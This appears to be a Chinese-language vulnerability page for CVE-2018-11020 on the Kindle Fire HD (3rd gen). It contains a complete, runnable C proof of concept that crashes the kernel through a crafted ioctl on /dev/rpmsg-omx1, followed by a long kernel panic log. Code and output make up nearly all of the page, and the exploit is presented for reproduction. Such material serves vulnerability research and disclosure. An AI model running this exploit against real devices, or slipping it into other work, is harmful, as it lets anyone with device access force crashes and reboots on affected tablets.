(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞


一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3 的内核模块 /omap/drivers/rpmsg/rpmsg_omx.c 存在安全漏洞:攻击者可以对设备文件 /dev/rpmsg-omx1 发起命令号为 3221772291 的 ioctl 调用,并在其参数中注入特制的数据,从而导致内核崩溃。

要触发此漏洞,必须先打开设备文件 /dev/rpmsg-omx1,然后以命令 3221772291 和精心构造的有效负载作为第三个参数,对该设备文件执行 ioctl 系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

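/*
 * This is a PoC for the Kindle Fire HD 3rd.
 * A bug in the ioctl interface of the device file /dev/rpmsg-omx1 causes a system crash via IOCTL 3221772291.
 * Related buggy struct name is gcicommit.
 * NOTE(review): the crash log on this page faults in ion_free() called from
 * rpmsg_omx_ioctl() and does not mention gcicommit; treat the struct name as unconfirmed.
 * This PoC must be run with permission to do ioctl on /dev/rpmsg-omx1.
 *
 * The following is the kmsg output of the kernel crash (reproduced in the crash log section of this page):
 *
 */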
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

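/* Device node whose ioctl handler this program exercises. */
static const char *driver = "/dev/rpmsg-omx1";

/*
 * ioctl request number: 3221772291 == 0xC0085803 (the same word is visible
 * on the kernel stack in the crash log on this page).
 *
 * The original declaration relied on implicit int, which has not been valid
 * C since C99, and the value does not fit in a signed 32-bit int, so the
 * stored value depended on an implementation-defined conversion. Declaring
 * it unsigned keeps the exact bit pattern and matches the %x format used
 * when it is printed.
 *
 * NOTE(review): under the generic Linux _IOC layout this value decodes as
 * direction read|write, size 8, type 0x58, nr 3 - confirm against the
 * driver's own header, which is not shown here.
 */
static const unsigned int command = 3221772291u;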

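/*
 * Open the device node named by `driver` and issue a single ioctl with
 * request `command`, passing a fixed four-word buffer as the argument.
 *
 * Returns 0 if the ioctl call returns successfully, -1 if either open() or
 * ioctl() fails. On failure a stage marker ("1" for open, "2" for ioctl) is
 * written to /data/local/tmp/log so the failing step can be identified after
 * the run.
 *
 * Reading the crash log on this page: the oops address b5d18de6 is the first
 * buffer word (0xb5d18de2) plus 4, the faulting PC is in ion_free, the link
 * register points into rpmsg_omx_ioctl, and r1 holds b5d18de2. That is
 * consistent with the driver handing a caller-supplied word to ion_free as a
 * pointer without first checking that it refers to a handle the caller owns.
 * NOTE(review): this is inferred from the log only; the driver source is not
 * shown here. A fix belongs in the ioctl handler (validate the handle before
 * freeing it), and access to the device node should be restricted.
 */
int main(int argc, char **argv, char **env) {
    /* Fixed argument buffer; its first word is the value seen in r1 in the crash log. */
    unsigned int payload[] = { 0xb5d18de2, 0xf6e48a17, 0x9179c429, 0x89a32e03 };
    /* Explicitly unsigned so the %x format and the ioctl request see the same bit pattern. */
    const unsigned int request = (unsigned int)command;
    int saved_errno;
    int fd;

    (void)argc;
    (void)argv;
    (void)env;

    fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log");
        return -1;
    }

    printf("Try open %s with command 0x%x.\n", driver, request);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, request, payload) < 0) {
        /* Capture errno before any further library call can overwrite it. */
        saved_errno = errno;
        /* The original message blamed a struct allocation; the failing call is ioctl(). */
        printf("ioctl on %s failed, errno %d\n", driver, saved_errno);
        system("echo 2 > /data/local/tmp/log");
        /* The original returned here without releasing the descriptor. */
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}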

崩溃日志

[  146.290710] Unable to handle kernel paging request at virtual address b5d18de6
[ 146.299438] pgd = d72dc000
[ 146.302795] [b5d18de6] *pgd=00000000
[ 146.307281] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[ 146.313232] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 146.320983] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 146.328308] PC is at ion_free+0xc/0xb4
[ 146.332672] LR is at rpmsg_omx_ioctl+0x2cc/0x598
[ 146.337890] pc : [<c02e8540>] lr : [<c048a120>] psr: 60000013
[ 146.337890] sp : c35b5e60 ip : c35b5e80 fp : c35b5e7c
[ 146.350860] r10: c35b5ea8 r9 : de88c4d8 r8 : c35b4000
[ 146.356872] r7 : dd32b580 r6 : 00000003 r5 : d71d5880 r4 : be92f5f8
[ 146.364135] r3 : d71d58ec r2 : d71d58ec r1 : b5d18de2 r0 : d7aaaa00
[ 146.371551] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 146.379516] Control: 10c5387d Table: 972dc04a DAC: 00000015
[ 146.386077]
[ 146.386077] PC: 0xc02e84c0:
[ 146.391052] 84c0 0a000001 e2871010 ebfddc25 e1a00006 eb0ee904 e5953058 e2433001 e5853058
[ 146.401580] 84e0 e3530000 ba000011 1a000009 e1a0200d e3c23d7f e3c3303f e285005c e593300c
[ 146.412292] 8500 e593723c e1a01007 ebf90a76 e597321c e585306c e1a00006 eb0ee876 e1a00005
[ 146.422821] 8520 ebffffb4 e1a00004 ebf8e011 e89da8f0 e7f001f2 e1a0c00d e92dd878 e24cb004
[ 146.433502] 8540 e5915004 e1a04001 e1550000 1a000021 e2856014 e1a00006 eb0ee8e2 e5953010
[ 146.444183] 8560 e3530000 0a000005 e243200c e1540002 2a00000a e5933008 e3530000 1afffff9
[ 146.454864] 8580 e59f0054 e3001219 e59f2050 e59f3050 ebf58268 e1a00006 eb0ee856 e89da878
[ 146.465393] 85a0 85933004 8affffed f57ff05f e1943f9f e2433001 e1842f93 e3320000 1afffffa
[ 146.476074]
[ 146.476074] LR: 0xc048a0a0:
[ 146.481048] a0a0 33a03000 e3530000 1affffae e24ba05c e1a01004 e3a02008 e1a0000a ebf7305e
[ 146.491729] a0c0 e3500000 1affffaa e5950068 e51b1058 ebf97677 e3500000 e50b005c 0a000001
[ 146.502380] a0e0 e3700a01 9affffc8 e3a03000 e50b305c eaffffc5 e3e00018 eaffff8e e1a00004
[ 146.513061] a100 e1a0100a e3a02008 ebf73154 e3500000 0affff88 eaffffc2 e5950068 ebf97904
[ 146.523590] a120 eaffffb9 e24b005c e3a01030 ebf7398b e3a02030 e597003c e1a03006 e58d2000
[ 146.534240] a140 e59f1280 e59f2274 ebf99069 e3e0000d eaffff78 e5933004 e7933101 e3530000
[ 146.544921] a160 0affff6c e5950068 ebf97651 e2509000 0a000021 e3790a01 8a00001f e5950068
[ 146.555603] a180 e1a01009 e24b2064 e24b3060 ebf97447 e3500000 050b905c 0affff9b e59f322c
[ 146.566131]
[ 146.566131] SP: 0xc35b5de0:
[ 146.571228] 5de0 00000004 d8cc50f4 60010013 00000001 00000001 c02e8540 60000013 ffffffff
[ 146.581787] 5e00 c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[ 146.592437] 5e20 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[ 146.603118] 5e40 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[ 146.613830] 5e60 d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 146.624389] 5e80 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 146.635070] 5ea0 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 146.645599] 5ec0 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 146.656158]
[ 146.656158] IP: 0xc35b5e00:
[ 146.661254] 5e00 c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[ 146.671936] 5e20 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[ 146.682495] 5e40 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[ 146.693176] 5e60 d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 146.703704] 5e80 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 146.714263] 5ea0 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 146.724914] 5ec0 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 146.735595] 5ee0 d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[ 146.746276]
[ 146.746276] FP: 0xc35b5dfc:
[ 146.751251] 5dfc ffffffff c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00
[ 146.761779] 5e1c b5d18de2 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000
[ 146.772308] 5e3c de88c4d8 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013
[ 146.783020] 5e5c ffffffff d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120
[ 146.793701] 5e7c c02e8540 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4
[ 146.804382] 5e9c c35b5ea8 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000
[ 146.814941] 5ebc c35b5f14 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc
[ 146.825592] 5edc 00000000 d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74
[ 146.836242]
[ 146.836242] R0: 0xd7aaa980:
[ 146.841217] a980 00000001 00000001 00000000 00000000 00004007 00000000 00000000 00000000
[ 146.851898] a9a0 00000020 00000000 00000000 00000000 00000300 d7aaa9b4 d7aaa9b4 c0248d00
[ 146.862518] a9c0 00000093 00000093 0000005d 00000002 00000000 00000000 00000000 00000000
[ 146.873077] a9e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 146.883728] aa00 d763b780 00000000 00000000 deabb480 00000000 00000001 00000000 00000000
[ 146.894409] aa20 d7aaaa20 d7aaaa20 00000000 00000105 c0903054 d7157440 00000f30 dcd4f220
[ 146.905090] aa40 00000093 00000003 00000017 00000000 00000000 00000000 00000000 00000000
[ 146.915618] aa60 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 146.926300]
[ 146.926300] R2: 0xd71d586c:
[ 146.931274] 586c 00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[ 146.941955] 588c d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[ 146.952636] 58ac d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[ 146.963287] 58cc 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[ 146.973815] 58ec d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[ 146.984497] 590c 00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[ 146.995147] 592c 00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[ 147.005676] 594c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.016357]
[ 147.016357] R3: 0xd71d586c:
[ 147.021453] 586c 00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[ 147.032012] 588c d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[ 147.042663] 58ac d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[ 147.053314] 58cc 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[ 147.063873] 58ec d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[ 147.074523] 590c 00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[ 147.085205] 592c 00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[ 147.095886] 594c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.106414]
[ 147.106445] R5: 0xd71d5800:
[ 147.111541] 5800 d71d5d00 00000000 00000000 dcfc4200 f0000009 00000211 00000001 00000001
[ 147.122070] 5820 00000000 00001000 00001000 00000004 00000000 d71d5844 c01519dc d89b54c0
[ 147.132751] 5840 c01576ac c10dc870 00001000 00000000 c0a10230 c0a10dc0 d1a1dd58 c006f724
[ 147.143432] 5860 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.154083] 5880 dd32b5c8 dd32b5c8 dd32b580 d71d588c d71d588c 00000000 00000000 00000000
[ 147.164611] 58a0 00000001 00000000 00000000 d71d58ac d71d58ac 00000000 00000000 00000000
[ 147.175140] 58c0 d71d58c0 d71d58c0 00000000 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0
[ 147.185821] 58e0 00000000 00000000 d7aaaa00 d71d58ec d71d58ec 00000000 00000000 00000000
[ 147.196472]
[ 147.196502] R7: 0xdd32b500:
[ 147.201446] b500 e2401000 f400f000 0202420f 0000c000 f400f000 dd071d20 00000000 d8f0a680
[ 147.212127] b520 d8f0a740 00000000 00000000 00000001 00000000 00000000 00000000 00000000
[ 147.222656] b540 00000000 00000000 00000001 00000000 00000000 00000000 00000000 00000000
[ 147.233184] b560 00000000 00000000 c153f430 00001000 00000000 00000000 00000000 00000000
[ 147.243865] b580 00000000 dd32b584 dd32b584 00000000 00000000 c0a16c60 00000000 00000002
[ 147.254547] b5a0 00000001 00000000 c06faab0 de88c61c de88c61c 0f700001 00000001 d8caa000
[ 147.265075] b5c0 dd0f7200 00000001 d71d5880 d71d5880 00000001 00000000 00000000 dd32b5dc
[ 147.275756] b5e0 dd32b5dc 00000000 7fffffff 00000000 00000000 dd32b5f4 dd32b5f4 00000000
[ 147.286407]
[ 147.286407] R8: 0xc35b3f80:
[ 147.291381] 3f80 66eff968 00000000 000000f0 c0013e08 c35b2000 00000000 00000000 c35b3fa8
[ 147.302032] 3fa0 c0013c60 c009a164 66eff978 66eff968 66eff978 00000080 00000000 00000000
[ 147.312713] 3fc0 66eff978 66eff968 00000000 000000f0 00000000 00000000 00000000 41d1f6a8
[ 147.323272] 3fe0 00000000 6716ebc8 400710f8 40083b80 600f0010 66eff978 00760061 00000061
[ 147.333923] 4000 00000000 00000002 00000000 d7157440 c0a0e840 00000000 00000015 d726ee00
[ 147.344604] 4020 d8d2c700 c35b4000 c09ddc50 d7157440 d8db57c0 c1617b40 c35b5b4c c35b5a98
[ 147.355133] 4040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[ 147.365814] 4060 0087d4c0 5ebfe27f 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.376464]
[ 147.376495] R9: 0xde88c458:
[ 147.381469] c458 de88c458 de88c458 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 147.392150] c478 00000000 00000000 de88c480 de88c480 00000000 de88c48c de88c48c 00000000
[ 147.402801] c498 5aefcde6 00000000 00000000 00000000 de88c4b0 28cfd730 00000000 00000000
[ 147.413330] c4b8 00200000 00000000 00000000 de88c4c4 de88c4c4 d8cbdf00 d8cbdf00 00000000
[ 147.424011] c4d8 000521b0 00000402 00000402 00000000 00000000 00000000 c06b9600 dd160400
[ 147.434661] c4f8 de88c5b0 d8c81030 00000f98 00000001 0f700001 5aefcde6 199c82ca 5aefcde6
[ 147.445312] c518 199c82ca 5aefcde6 199c82ca 00000000 00000000 00000000 00000000 00000000
[ 147.455871] c538 00000000 00000000 00000000 00000000 00000001 00000000 00000000 de88c554
[ 147.466522]
[ 147.466522] R10: 0xc35b5e28:
[ 147.471588] 5e28 be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8 c35b5ea8 c35b5e7c
[ 147.482269] 5e48 c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff d71d58ec be92f5f8
[ 147.492950] 5e68 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540 c35b5edc c35b5e90
[ 147.503631] 5e88 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8 c00723a0 000fffff
[ 147.514160] 5ea8 b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14 00000000 00000001
[ 147.524688] 5ec8 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000 d72400c0 00000004
[ 147.535339] 5ee8 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08 c0136044 c0489e60
[ 147.546020] 5f08 00000000 00000000 00000000 00000001 00000000 dd055190 dd5e7f68 c35b5f0c
[ 147.556579] Process rpmsg_omx_ioctl (pid: 3888, stack limit = 0xc35b42f8)
[ 147.564270] Stack: (0xc35b5e60 to 0xc35b6000)
[ 147.569213] 5e60: d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 147.578430] 5e80: c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 147.587646] 5ea0: c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 147.596740] 5ec0: 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 147.605957] 5ee0: d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[ 147.615173] 5f00: c0136044 c0489e60 00000000 00000000 00000000 00000001 00000000 dd055190
[ 147.624389] 5f20: dd5e7f68 c35b5f0c c35b4000 be92f628 be92f5f8 c0085803 d72400c0 00000004
[ 147.633483] 5f40: c35b4000 00000000 c35b5f64 00000000 be92f5f8 c0085803 d72400c0 00000004
[ 147.642730] 5f60: c35b4000 00000000 c35b5fa4 c35b5f78 c01365e0 c0135fc4 00000000 00000000
[ 147.651947] 5f80: 00000400 be92f628 00010e54 00000000 00000036 c0013e08 00000000 c35b5fa8
[ 147.661010] 5fa0: c0013c60 c0136578 be92f628 00010e54 00000004 c0085803 be92f5f8 be92f5f8
[ 147.670104] 5fc0: be92f628 00010e54 00000000 00000036 00000000 00000000 00000000 be92f614
[ 147.679321] 5fe0: 00000000 be92f5dc 00010690 0002917c 60000010 00000004 00000017 579e6e78
[ 147.688537] Backtrace:
[ 147.691558] [<c02e8534>] (ion_free+0x0/0xb4) from [<c048a120>] (rpmsg_omx_ioctl+0x2cc/0x598)
[ 147.701049] r6:00000003 r5:d71d5880 r4:be92f5f8 r3:d71d58ec
[ 147.708068] [<c0489e54>] (rpmsg_omx_ioctl+0x0/0x598) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 147.717956] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 147.727203] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 147.736450] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:be92f628
[ 147.744873] Code: e7f001f2 e1a0c00d e92dd878 e24cb004 (e5915004)
[ 147.754913] Board Information:
[ 147.754913] Revision : 0001
[ 147.754943] Serial : 0000000000000000
[ 147.754943] SoC Information:
[ 147.754943] CPU : OMAP4470
[ 147.754943] Rev : ES1.0
[ 147.754974] Type : HS
[ 147.754974] Production ID: 0002B975-000000CC
[ 147.754974] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 147.755004]
[ 147.794616] ---[ end trace 50912198cfc81720 ]---
[ 147.799957] Kernel panic - not syncing: Fatal exception
[ 147.805847] CPU0: stopping
[ 147.808959] Backtrace:
[ 147.812133] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 147.821502] r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[ 147.828643] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 147.837860] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 147.847259] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[ 147.856567] Exception stack(0xdd187b38 to 0xdd187b80)
[ 147.862243] 7b20: 00000002 00000002
[ 147.871459] 7b40: 00000002 00000001 dd187bbc c1621100 c1621100 00c6a000 c1621108 00000001
[ 147.880676] 7b60: 00000001 dd187bac 00000002 dd187b80 c002398c c009ae48 200d0013 ffffffff
[ 147.889892] r6:ffffffff r5:200d0013 r4:c009ae48 r3:c002398c
[ 147.896911] [<c009add0>] (generic_exec_single+0x0/0x98) from [<c009af78>] (smp_call_function_single+0x110/0x1e0)
[ 147.908325] [<c009ae68>] (smp_call_function_single+0x0/0x1e0) from [<c009b28c>] (smp_call_function_many+0x244/0x294)
[ 147.920104] [<c009b048>] (smp_call_function_many+0x0/0x294) from [<c009b48c>] (smp_call_function+0x48/0x74)
[ 147.931030] [<c009b444>] (smp_call_function+0x0/0x74) from [<c04310f4>] (cpuidle_latency_notify+0x20/0x28)
[ 147.941864] r4:ffffffff r3:c04310d4
[ 147.946258] [<c04310d4>] (cpuidle_latency_notify+0x0/0x28) from [<c06a7154>] (notifier_call_chain+0x4c/0x8c)
[ 147.957305] [<c06a7108>] (notifier_call_chain+0x0/0x8c) from [<c006ebc0>] (__blocking_notifier_call_chain+0x50/0x68)
[ 147.969085] r8:200d0013 r7:000000a0 r6:00000000 r5:ffffffff r4:c0a11df8
[ 147.977020] r3:ffffffff
[ 147.980499] [<c006eb70>] (__blocking_notifier_call_chain+0x0/0x68) from [<c006ebf8>] (blocking_notifier_call_chain+0x20/0x28)
[ 147.993133] r7:de95183c r6:000000a0 r5:0000115c r4:c0a11d98
[ 148.000152] [<c006ebd8>] (blocking_notifier_call_chain+0x0/0x28) from [<c0088eec>] (pm_qos_update_target+0xf8/0x19c)
[ 148.011932] [<c0088df4>] (pm_qos_update_target+0x0/0x19c) from [<c008909c>] (pm_qos_update_request+0x5c/0x8c)
[ 148.023071] [<c0089040>] (pm_qos_update_request+0x0/0x8c) from [<c0411b18>] (omap_i2c_xfer+0x2bc/0x6c8)
[ 148.033599] r5:dd187da0 r4:00000000
[ 148.038024] [<c041185c>] (omap_i2c_xfer+0x0/0x6c8) from [<c040e5cc>] (i2c_transfer+0xb8/0xf8)
[ 148.047637] [<c040e514>] (i2c_transfer+0x0/0xf8) from [<c040e930>] (i2c_smbus_xfer+0x278/0x588)
[ 148.057434] [<c040e6b8>] (i2c_smbus_xfer+0x0/0x588) from [<c040eedc>] (i2c_smbus_read_word_data+0x3c/0x4c)
[ 148.068267] [<c040eea0>] (i2c_smbus_read_word_data+0x0/0x4c) from [<c0418760>] (bq27541_i2c_read.constprop.7+0x20/0x54)
[ 148.080200] [<c0418740>] (bq27541_i2c_read.constprop.7+0x0/0x54) from [<c04189f0>] (battery_handle_work+0x120/0x6a4)
[ 148.091857] r5:dd187e92 r4:dd08b920
[ 148.096374] [<c04188d0>] (battery_handle_work+0x0/0x6a4) from [<c0063278>] (process_one_work+0x150/0x468)
[ 148.107116] [<c0063128>] (process_one_work+0x0/0x468) from [<c00638c4>] (worker_thread+0x13c/0x320)
[ 148.117156] [<c0063788>] (worker_thread+0x0/0x320) from [<c0068af4>] (kthread+0x90/0x9c)
[ 148.126312] [<c0068a64>] (kthread+0x0/0x9c) from [<c004cd64>] (do_exit+0x0/0x7e0)
[ 148.134765] r6:c004cd64 r5:c0068a64 r4:dd0aded4
[ 148.140533] CPU0 PC (0) : 0xc0019b2c
[ 148.144714] CPU0 PC (1) : 0xc0019b2c
[ 148.148773] CPU0 PC (2) : 0xc0019b2c
[ 148.152832] CPU0 PC (3) : 0xc0019b2c
[ 148.156890] CPU0 PC (4) : 0xc0019b2c
[ 148.161071] CPU0 PC (5) : 0xc0019b2c
[ 148.165130] CPU0 PC (6) : 0xc0019b2c
[ 148.169189] CPU0 PC (7) : 0xc0019b2c
[ 148.173370] CPU0 PC (8) : 0xc0019b2c
[ 148.177429] CPU0 PC (9) : 0xc0019b2c
[ 148.181488] CPU1 PC (0) : 0xc003ee38
[ 148.185668] CPU1 PC (1) : 0xc003ee54
[ 148.189727] CPU1 PC (2) : 0xc003ee54
[ 148.193786] CPU1 PC (3) : 0xc003ee54
[ 148.197967] CPU1 PC (4) : 0xc003ee54
[ 148.202026] CPU1 PC (5) : 0xc003ee54
[ 148.206085] CPU1 PC (6) : 0xc003ee54
[ 148.210266] CPU1 PC (7) : 0xc003ee54
[ 148.214324] CPU1 PC (8) : 0xc003ee54
[ 148.218383] CPU1 PC (9) : 0xc003ee54
[ 148.222442]
[ 148.224365] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 148.224365]

FROM :ol4three.com | Author:ol4three
